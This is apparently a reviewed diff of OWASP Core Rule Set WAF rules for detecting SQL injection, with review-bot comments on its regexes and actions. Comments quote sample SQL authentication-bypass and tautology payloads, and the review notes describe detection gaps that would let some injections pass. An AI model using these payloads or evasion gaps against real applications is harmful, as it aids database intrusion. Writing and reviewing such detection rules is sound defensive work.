+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942360 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:(?:alter|(?:(?:cre|trunc|upd)at|renam)e|de(?:lete|sc)|(?:inser|selec)t|load)[\s\v]+(?:char|group_concat|load_file)\b[\s\v]*\(?|end[\s\v]*?\);)|[\s\v\(]load_file[\s\v]*?\(|[\"'`][\s\v]+regexp[^0-9A-Z_a-z]|[\"'0-9A-Z_-z][\s\v]+as\b[\s\v]*[\"'0-9A-Z_-z]+[\s\v]*\bfrom|^[^A-Z_a-z]+[\s\v]*?(?:(?:(?:(?:cre|trunc)at|renam)e|d(?:e(?:lete|sc)|rop)|(?:inser|selec)t|load)[\s\v]+[0-9A-Z_a-z]+|u(?:pdate[\s\v]+[0-9A-Z_a-z]+|nion[\s\v]*(?:all|(?:sele|distin)ct)\b)|alter[\s\v]*(?:a(?:(?:ggregat|pplication[\s\v]*rol)e|s(?:sembl|ymmetric[\s\v]*ke)y|u(?:dit|thorization)|vailability[\s\v]*group)|b(?:roker[\s\v]*priority|ufferpool)|c(?:ertificate|luster|o(?:l(?:latio|um)|nversio)n|r(?:edential|yptographic[\s\v]*provider))|d(?:atabase|efault|i(?:mension|skgroup)|omain)|e(?:(?:ndpoi|ve)nt|xte(?:nsion|rnal))|f(?:lashback|oreign|u(?:lltext|nction))|hi(?:erarchy|stogram)|group|in(?:dex(?:type)?|memory|stance)|java|l(?:a(?:ngua|r)ge|ibrary|o(?:ckdown|g(?:file[\s\v]*group|in)))|m(?:a(?:s(?:k|ter[\s\v]*key)|terialized)|e(?:ssage[\s\v]*type|thod)|odule)|(?:nicknam|queu)e|o(?:perator|utline)|p(?:a(?:ckage|rtition)|ermission|ro(?:cedur|fil)e)|r(?:e(?:mot|sourc)e|o(?:l(?:e|lback)|ute))|s(?:chema|e(?:arch|curity|rv(?:er|ice)|quence|ssion)|y(?:mmetric[\s\v]*key|nonym)|togroup)|t(?:able(?:space)?|ext|hreshold|r(?:igger|usted)|ype)|us(?:age|er)|view|w(?:ork(?:load)?|rapper)|x(?:ml[\s\v]*schema|srobject))\b)" \ "id:942360,\ phase:2,\ block,\ 
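Review bot: The new explanatory comment for 942360 has two wording defects: `This rule has two stricter sibling:` should be `siblings`, and `loose word boundaries and context checksum cause further false positives` does not parse; presumably `loose word boundaries and context checks, which caused further false positives`. The regenerated expression also uses the range `_-z` inside `[\"'0-9A-Z_-z]` (twice); that is bytes 0x5F–0x7A, i.e. `_`, the backtick and `a-z`, so it is equivalent to the old `[\"'`\w]` but reads like a typo, and a one-line comment above the rule (`# Note: "_-z" is a byte range covering _, backtick and a-z`) would save the next reader a trip to the assembler. The leading class for the `as … from` branch changed from `[\d\W]` to that word-character set, which the comment attributes to 942362 taking over the looser form; worth cross-checking that 942362 really carries the old `[\d\W]` variant. The rule's action list continues past the hunk.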
@@ -438,10 +482,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # # -=[ Detect MySQL in-line comments ]=- @@ -458,7 +502,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME # The minimal string that triggers this regexp is: /*!*/ or /*+*/. # The rule 942500 is related to 942440 which catches both /*! and */ independently. # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:/\*[!+](?:[\w\s=_\-()]+)?\*/)" \ +# Regular expression generated from regex-assembly/942500.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942500 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)/\*[\s\v]*?[!\+](?:[\s\v\(-\)\-0-9=A-Z_a-z]+)?\*/" \ "id:942500,\ phase:2,\ block,\ 
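Review bot: The regenerated 942500 expression now tolerates whitespace between `/*` and the `!`/`+` marker (`/\*[\s\v]*?[!\+]`), but the comment kept as context in the hunk still states the minimal trigger as `/*!*/` or `/*+*/` and gives no hint that `/* !*/` is also caught; add `# Whitespace between "/*" and "!"/"+" is also accepted (e.g. "/* !*/").` after that line. The class `[\s\v\(-\)\-0-9=A-Z_a-z]` is the same set as the old `[\w\s=_\-()]`, just spelled as byte ranges (`\(-\)` is the two parentheses), so no other behaviour change is introduced here. The rule's action list continues past the hunk.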
@@ -474,35 +523,92 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + multiMatch,\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# This rule catches an authentication bypass via SQL injection that abuses semi-colons to end the SQL query early. +# Any characters after the semi-colon are ignored by some DBMSes (e.g. SQLite). +# +# An example of this would be: +# email=admin%40juice-sh.op';&password=foo +# +# The server then turns this into: +# SELECT * FROM users WHERE email='admin@juice-sh.op';' AND password='foo' # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Regular expression generated from regex-assembly/942540.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942540 # +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^(?:[^']*'|[^\"]*\"|[^`]*`)[\s\v]*;" \ + "id:942540,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'SQL Authentication bypass (split query)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# This rule catches on Scientific Notation bypass payloads in MySQL +# Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md#scientific-notation # -# -=[ String Termination/Statement Ending Injection Testing ]=- +# Regular expression generated from regex-assembly/942560.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942560 # -# Identifies common initial SQLi probing requests where attackers insert/append -# quote characters to the existing normal payload to see how the app/db responds. 
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)1\.e[\(-\),]" \ + "id:942560,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'MySQL Scientific Notation payload detected',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# This rule tries to match JSON SQL syntax that could be used as a bypass technique. +# Referring to this research: https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf # -# This rule is also triggered by the following exploit(s): -# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# Regular expression generated from regex-assembly/942550.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942550 # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ - "id:942110,\ +SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" \ + "id:942550,\ phase:2,\ block,\ - capture,\ - t:none,t:utf8toUnicode,t:urlDecodeUni,\ - msg:'SQL Injection Attack: Common Injection Testing Detected',\ + t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,\ + msg:'JSON-Based SQL Injection',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -511,11 +617,18 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ - severity:'WARNING',\ - setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# # 
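Review bot: 942550 and 942560 both print `%{TX.0}` in `logdata` but neither carries the `capture` action (the old `capture,\` line is removed where 942550 is written and 942560 goes straight from `block,\` to `t:none`), so the audit log shows either an empty TX.0 or a stale capture left by an earlier rule such as 942540 — misleading for anyone triaging the event. Add `capture,\` after `block,\` in both, as 942540 does; 942550's action list continues into the next hunk. Separately, the 942550 expression chains four unbounded `.*` around alternations, which on long argument values can approach the PCRE match limit; consider bounding the gaps with a negated class such as `[^\"']*` and making `(::.*jsonb?)` non-capturing.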
@@ -524,15 +637,12 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?:^\s*[\"'`;]+|[\"'`]+\s*$)" \ # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942120.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942120.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Regular expression generated from regex-assembly/942120.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942120 # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\b(?:r(?:egexp|like)|isnull|xor)\b|<(?:>(?:\s+binary)?|=>?|<)|r(?:egexp|like)\s+binary|not\s+between\s+0\s+and|(?:like|is)\s+null|>[=>]|\|\||!=|&&))" \ +SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=->]|<(?:<|=>?|>(?:[\s\v]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\v]*\()|r(?:egexp|like)[\s\v]+binary|not[\s\v]+between[\s\v]+(?:0[\s\v]+and|(?:'[^']*'|\"[^\"]*\")[\s\v]+and[\s\v]+(?:'[^']*'|\"[^\"]*\"))|is[\s\v]+null|like[\s\v]+(?:null|[0-9A-Z_a-z]+[\s\v]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\v\+]*\([\s\v\"0-9]+[^\(-\)]*\)|[!<->]{1,2}[\s\v]*all\b" \ "id:942120,\ phase:2,\ block,\ 
@@ -548,33 +658,39 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\)|\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Tautologies ]=- # -# Regexp generated from util/regexp-assemble/regexp-942130.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942130.data -# Note that after assemble an outer bracket with an ignore case flag is added -# to the Regexp::Assemble output: -# (?i:ASSEMBLE_OUTPUT) +# Boolean-based SQL injection or tautology attack. Boolean values (True or False) are used to carry out +# this type of SQL injection. The malicious SQL query forces the web application to return a different result de- +# pending on whether the query returns a TRUE or FALSE result. +# +# The original 942130 was split in two rules: +# - 942130 targets tautologies using equalities (e.g. 1 = 1) +# - 942131 targets tautologies using inequalities (e.g. 1 != 2) # -# Not supported by re2 (backreferences, lookaheads). +# We use captures to check for (in)equality in the regexp. So TX.1 will capture the left hand side (LHS) of the inequality, +# and TX.2 will capture the right hand side (RHS) of the logical query. # -SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?:<(?:=(?:[\s'\"`()]*?(?!\b\1\b)[\d\w]+|>[\s'\"`()]*?(?:\b\1\b))|>?[\s'\"`()]*?(?!\b\1\b)[\d\w]+)|(?:not\s+(?:regexp|like)|is\s+not|>=?|!=|\^)[\s'\"`()]*?(?!\b\1\b)[\d\w]+|(?:(?:sounds\s+)?like|r(?:egexp|like)|=)[\s'\"`()]*?(?:\b\1\b)))" \ +# Regular expression generated from regex-assembly/942130.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942130 +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\"'-\)`]*?(?:=|<=>|(?:sounds[\s\v]+)?like|glob|r(?:like|egexp))[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b" \ "id:942130,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:replaceComments,\ - msg:'SQL Injection Attack: SQL Tautology Detected',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + msg:'SQL Injection Attack: SQL Boolean-based attack detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942130_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ 
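Review bot: The new 942130 depends on `capture` plus a chained `@streq` on TX.1/TX.2 (the chain is in the next hunk), and `@rx` records only the leftmost match, so a value like `foo=bar or 1=1` captures `foo`/`bar`, the chain fails and the `1=1` to the right is never compared — the backreference pattern this replaces (dropped, per the removed note, for re2 compatibility) scanned the whole value. The same construction is case-sensitive where the pattern is `(?i)`: `a = A` captures `a`/`A` and `@streq` rejects it, although it is a tautology under MySQL's default case-insensitive collations; adding `t:lowercase` to the parent's transformation line (`t:none,t:urlDecodeUni,t:replaceComments,t:lowercase,\`) closes that one. The leftmost-match limit should at least be stated in the header, e.g. `# NOTE: only the first comparison in a value is checked; an unequal pair followed by 1=1 is not seen`, and the sentence `TX.1 will capture the left hand side (LHS) of the inequality` is 942131 wording — for this rule it is the equality comparison.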
@@ -583,12 +699,51 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?: tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - multiMatch,\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.942130_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "@streq %{TX.2}" \ + "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" +# Rule Targeting logical inequalities that return TRUE (e.g. 1 != 2) +# +# +# We use captures to check for (in)equality in the regexp. So TX.1 will capture the left hand side (LHS) of the inequality, +# and TX.2 will capture the right hand side (RHS) of the logical query. +# +# Regular expression generated from regex-assembly/942131.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942131 +# +SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\"'-\)`]*?(?:![<->]|<[=->]?|>=?|\^|is[\s\v]+not|not[\s\v]+(?:like|r(?:like|egexp)))[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b" \ + "id:942131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:replaceComments,\ + msg:'SQL Injection Attack: SQL Boolean-based attack detected',\ + logdata:'Matched Data: %{TX.0} found within %{TX.942131_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-sqli',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/66',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.942131_matched_var_name=%{matched_var_name}',\ + chain" + SecRule TX:1 "!@streq %{TX.2}" \ 
+ "t:none,\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # # -=[ SQL Function Names ]=- 
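Review bot: The 942131 header says it targets `logical inequalities that return TRUE (e.g. 1 != 2)`, but the operator set includes `<`, `>`, `<=`, `>=` (`<[=->]?|>=?`) and the chain only checks `!@streq`, so `5 < 2` scores exactly like `1 != 2`; the comment should say the rule flags any comparison of two different tokens regardless of truth value, e.g. `# Rule targeting comparisons of two different operands (e.g. 1 != 2, 1 < 2); whether the expression actually evaluates TRUE is not checked`. 942131 also keeps `multiMatch,\` while this hunk removes it from 942130 (`- multiMatch,\`); if the asymmetry is intended, a one-line comment explaining why would save the next maintainer re-deriving it, otherwise align the two.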
@@ -596,22 +751,18 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\s'\"`()]*?\b([\d\w]+)\b[\s'\"`()]*?(?: # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] # -# Regexp generated from util/regexp-assemble/regexp-942150.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942150.data -# Note that after assemble an ignore case flag and a word boundary is added -# in front of the Regexp::Assemble output. -# And a non-word character and an opening bracket is added behind the Regexp::Assemble output: -# (?i)\bASSEMBLE_OUTPUT\W*\( +# Regular expression generated from regex-assembly/942150.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 942150 # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)\b(?:c(?:o(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|(?:un)?t|llation|alesce)|ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)|s(?:u(?:b(?:str(?:ing(?:_index)?)?|(?:dat|tim)e)|m)|t(?:d(?:dev_(?:sam|po)p)?|r(?:_to_date|cmp))|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha[12]?|oundex|chema|ig?n|leep|pace|qrt)|i(?:s(?:_(?:ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|(?:free|used)_lock)|null)|n(?:et(?:6_(?:aton|ntoa)|_(?:aton|ntoa))|s(?:ert|tr)|terval)?|f(?:null)?)|d(?:a(?:t(?:e(?:_(?:format|add|sub)|diff)?|abase)|y(?:of(?:month|week|year)|name)?)|e(?:(?:s_(?:de|en)cryp|faul)t|grees|code)|count|ump)|l(?:o(?:ca(?:l(?:timestamp)?|te)|g(?:10|2)?|ad_file|wer)|ast(?:_(?:inser_id|day))?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(?:time(?:stamp)?|date)|p(?:datexml|per)|uid(?:_short)?|case|ser)|t(?:ime(?:_(?:format|to_sec)|stamp(?:diff|add)?|diff)?|o(?:(?:second|day)s|_base64|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:nth(?:name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|a(?:wtohex|dians|nd)|o(?:w_count|und)|ight|trim|pad)|f(?:i(?:eld(?:_in_set)?|nd_in_set)|rom_(?:unixtime|base64|days)|o(?:und_rows|rmat)|loor)|p(?:o(?:w(?:er)?|sition)|eriod_(?:diff|add)|rocedure_analyse|assword|g_sleep|i)|a(?:s(?:cii(?:str)?|in)|es_(?:de|en)crypt|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|b(?:i(?:t_(?:length|count|x?or|and)|n(?:_to_num)?)|enchmark)|e(?:x(?:tract(?:value)?|p(?:ort_set)?)|nc(?:rypt|ode)|lt)|g(?:r(?:oup_conca|eates)t|et_(?:format|lock))|v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|o(?:(?:ld_passwo)?rd|ct(?:et_length)?)|we(?:ek(?:ofyear|day)?|ight_string)|n(?:o(?:t_in|w)|ame_const|ullif)|h(?:ex(?:toraw)?|our)|qu(?:arter|ote)|year(?:week)?|xmltype)\W*\(" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?i)\b(?:json(?:_[0-9A-Z_a-z]+)?|a(?:bs|(?:cos|sin)h?|tan[2h]?|vg)|c(?:eil(?:ing)?|h(?:a(?:nges|r(?:set)?)|r)|o(?:alesce|sh?|unt)|ast)|d(?:e(?:grees|fault)|a(?:te|y))|exp|f(?:loor(?:avg)?|ormat|ield)|g(?:lob|roup_concat)|h(?:ex|our)|i(?:f(?:null)?|if|n(?:str)?)|l(?:ast(?:_insert_rowid)?|ength|ike(?:l(?:ihood|y))?|n|o(?:ad_extension|g(?:10|2)?|wer(?:pi)?|cal)|trim)|m(?:ax|in(?:ute)?|o(?:d|nth))|n(?:ullif|ow)|p(?:i|ow(?:er)?|rintf|assword)|quote|r(?:a(?:dians|ndom(?:blob)?)|e(?:p(?:lace|eat)|verse)|ound|trim|ight)|s(?:i(?:gn|nh?)|oundex|q(?:lite_(?:compileoption_(?:get|used)|offset|source_id|version)|rt)|u(?:bstr(?:ing)?|m)|econd|leep)|t(?:anh?|otal(?:_changes)?|r(?:im|unc)|ypeof|ime)|u(?:n(?:icode|likely)|(?:pp|s)er)|zeroblob|bin|v(?:alues|ersion)|week|year)[^0-9A-Z_a-z]*\(" \ "id:942150,\ phase:2,\ block,\ capture,\ t:none,t:urlDecodeUni,t:lowercase,\ - msg:'SQL Injection Attack',\ + msg:'SQL Injection Attack: SQL function name detected',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ 
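Review bot: The regenerated 942150 list is now SQLite-centric and drops names the old pattern matched that SQLi tooling leans on — `benchmark`, `concat`, `load_file`, `extractvalue`, `updatexml`, `pg_sleep`, `find_in_set`, `database`, `system_user` — while adding `sleep`, `password`, `load_extension` and `json_*`; nothing in this hunk says where that coverage went. If a sibling rule now holds the MySQL/PostgreSQL names (the hunk does not show one), the header comment above 942150 should reference it by id; if not, this is a net detection loss at PL2 that deserves a regression test. Minor: with `t:lowercase` applied, the `(?i)` flag on the pattern is redundant but harmless.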
@@ -621,21 +772,34 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# Regexp generated from util/regexp-assemble/regexp-942180.data using Regexp::Assemble. -# To rebuild the regexp: -# cd util/regexp-assemble -# ./regexp-assemble.pl regexp-942180.data -# Note that after assemble an ignore case flag is inserted in the -# first non-capturing group from the Regexp::Assemble output: -# ASSEMBLE_OUTPUT | s/^(?:/(?i:/ # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i:[\"'`](?:\s*?(?:(?:between|x?or|and|div)[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]|like(?:[\w\s-]+\s*?[+<>=(),-]\s*?[\d\"'`]|\W+[\w\"'`(])|[!=|](?:[\d\s!=+-]+.*?[\"'`(].*?|[\d\s!=]+.*?\d+)$|[^\w\s]?=\s*?[\"'`])|(?:\W*?[+=]+\W*?|[<>~]+)[\"'`])|(?:/\*)+[\"'`]+\s?(?:\/\*|--|\{|#)?|\d[\"'`]\s+[\"'`]\s+\d|where\s[\s\w\.,-]+\s=|^admin\s*?[\"'`]|\sis\s*?0\W)" \ +# -=[ SQL Authentication Bypasses ]=- +# +# Authentication bypass occurs when the attacker can log in as another user +# without knowing the user's password. The example bypass could look like this: +# +# x' OR 'x +# +# Because of the quantity of different rules they are split into: +# - 942540 PL1 +# - 942180 PL2 +# - 942260 PL2 +# - 942340 PL2 +# - 942520 PL2 +# - 942521 PL2 +# - 942522 PL2 + +# Regular expression generated from regex-assembly/942180.ra. 
